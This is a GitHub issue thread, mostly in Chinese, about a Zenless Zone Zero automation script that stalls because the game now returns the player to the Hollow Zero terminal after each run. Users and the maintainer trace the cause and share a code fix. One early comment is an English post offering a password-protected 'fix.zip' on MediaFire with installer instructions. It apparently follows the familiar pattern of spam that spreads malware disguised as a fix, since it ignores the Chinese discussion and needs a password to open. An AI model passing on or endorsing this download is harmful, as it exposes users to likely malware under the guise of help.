### ISSUE TITLE
[Bug]: 游戏打完一把零号空洞结算后直接回到主角视角导致脚本无法开始

### ISSUE THREAD

**Issue by seywea** [sMythicalBird/ZenlessZoneZero-Auto#215]
### 请确保您已经阅读并同意以下要求

- [X] 我已阅读项目使用说明，并且按照要求更改了游戏配置
- [X] 我已经搜索过已有的[issue](https://github.com/sMythicalBird/ZenlessZoneZero-Auto/issues)，确认当前问题没有被提出过
- [X] 我已经知晓并同意，若由于个人未按要求配置导致的问题，将不会被处理
- [X] 我已经知晓并同意，若该问题与程序无关，将不会被处理

### 项目版本

v2.3

### 系统版本

Windows 10

### bug情况描述

貌似是官方修改了零号空洞的结算界面，上周还正常，这周打完一把零号空洞，结算后会回到空洞的选择页(就是选旧都列车还是施工前线的界面)，现在打完一把结算后就直接变成主角站在零号空洞的电脑旁了，还要再按下F,才能又进入到零号空洞选择页，然后脚本就不动了，要手动按下F才会开始。

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sMythicalBird** [comment]
应该是才改的

**Comment by nfjBill** [comment]
确实如此 群里大佬们都没这个问题 貌似少数人有这个问题

**Comment by wizardt** [comment]
同样的问题，好奇怪啊

**Comment by wizardt** [comment]
已解决。重新阅读了游戏设置的详细说明，https://fairy.autoscript.site/zh/demo/required.html。 电脑打开了夜间模式，图像变成暖色，导致无法识别了吧

**Comment by wizardt** [comment]
不好意思，关闭了夜间模式，仍然不行，游戏设置已经和给出的设置要求一模一样了。结算界面，右下角只有一个“完成”按钮，点击后，就会直接回到主角站在零号空洞的电脑旁的界面。 并不会回到空洞选择界面。

**Comment by sMythicalBird** [comment]
> 不好意思，关闭了夜间模式，仍然不行，游戏设置已经和给出的设置要求一模一样了。结算界面，右下角只有一个“完成”按钮，点击后，就会直接回到主角站在零号空洞的电脑旁的界面。 并不会回到空洞选择界面。

截几张相关的图发我记录下，我没出现过退出的情况

**Comment by wizardt** [comment]
> > 不好意思，关闭了夜间模式，仍然不行，游戏设置已经和给出的设置要求一模一样了。结算界面，右下角只有一个“完成”按钮，点击后，就会直接回到主角站在零号空洞的电脑旁的界面。 并不会回到空洞选择界面。
> 
> 截几张相关的图发我记录下，我没出现过退出的情况

![image](https://github.com/user-attachments/assets/2597378c-6aa7-4c63-bdb4-33fa57d366e3)
通关后，脚本会在这个界面点击右下角的“完成”按钮。然后游戏LOADING，之后就是主角站在零号空洞的电脑旁了。好像最近游戏更新后就突然变成这样了。
![image](https://github.com/user-attachments/assets/a2259a9c-bae7-4c70-92db-e96d7cf3297d)

**Comment by sMythicalBird** [comment]
@wizardt 奖励刷完了吗，是国服还是国际版啊

**Comment by wizardt** [comment]
> @wizardt 奖励刷完了吗，是国服还是国际版啊

国服，所有的一切都没问题，模式无论是全刷还是单拿了业绩就跑，退出时一律会退到这里。。。可能需要加一个退出后这个界面按F重新进的逻辑了。。。

**Comment by wizardt** [comment]
> 后续加一下

感谢大佬。后续通过什么思路解决的可否说一句，我也学习下。

**Comment by sMythicalBird** [comment]
> > 后续加一下
> 
> 感谢大佬。后续通过什么思路解决的可否说一句，我也学习下。

给这几个页面加个判断就行

**Comment by nfjBill** [comment]
打完设置个延迟 按个f就行了

**Comment by seywea** [comment]
原来这是小概率事件啊，难怪😔

**Comment by nfjBill** [comment]
![image](https://github.com/user-attachments/assets/ed2d86a3-bae4-4f5c-bcc1-ff0b89e7cf07)
有这个问题的 可以去`event_handling/zero/other.py`添加红圈里的代码就行了

**Comment by sMythicalBird** [comment]
> ![image](https://private-user-images.githubusercontent.com/16789994/365407991-ed2d86a3-bae4-4f5c-bcc1-ff0b89e7cf07.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjU3ODMwNDgsIm5iZiI6MTcyNTc4Mjc0OCwicGF0aCI6Ii8xNjc4OTk5NC8zNjU0MDc5OTEtZWQyZDg2YTMtYmFlNC00ZjVjLWJjYzEtZmYwYjg5ZTdjZjA3LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MDglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTA4VDA4MDU0OFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTE2NDk0YzViMDgwZWI3MDliZjk4MWJlZGY4Zjg1YTQ3ZmY4YTVkMGE4MDY3Mzc5M2JmMmFiNDlmZGEzNjFkMWImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.4nnt51NkYvY4fSJ8fHt87i8hEEG_Jr53Uce9_mBvIVU) 有这个问题的 可以去`event_handling/zero/other.py`添加红圈里的代码就行了

可以这样解决，不过似乎大部分人都没退出，到底是哪里的设置问题啊

**Comment by nfjBill** [comment]
> > ![image](https://private-user-images.githubusercontent.com/16789994/365407991-ed2d86a3-bae4-4f5c-bcc1-ff0b89e7cf07.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjU3ODMwNDgsIm5iZiI6MTcyNTc4Mjc0OCwicGF0aCI6Ii8xNjc4OTk5NC8zNjU0MDc5OTEtZWQyZDg2YTMtYmFlNC00ZjVjLWJjYzEtZmYwYjg5ZTdjZjA3LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MDglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTA4VDA4MDU0OFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTE2NDk0YzViMDgwZWI3MDliZjk4MWJlZGY4Zjg1YTQ3ZmY4YTVkMGE4MDY3Mzc5M2JmMmFiNDlmZGEzNjFkMWImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.4nnt51NkYvY4fSJ8fHt87i8hEEG_Jr53Uce9_mBvIVU) 有这个问题的 可以去`event_handling/zero/other.py`添加红圈里的代码就行了
> 
> 可以这样解决，不过似乎大部分人都没退出，到底是哪里的设置问题啊

我怀疑是不是`作战机略`拿满的原因 只是猜疑 并不确定
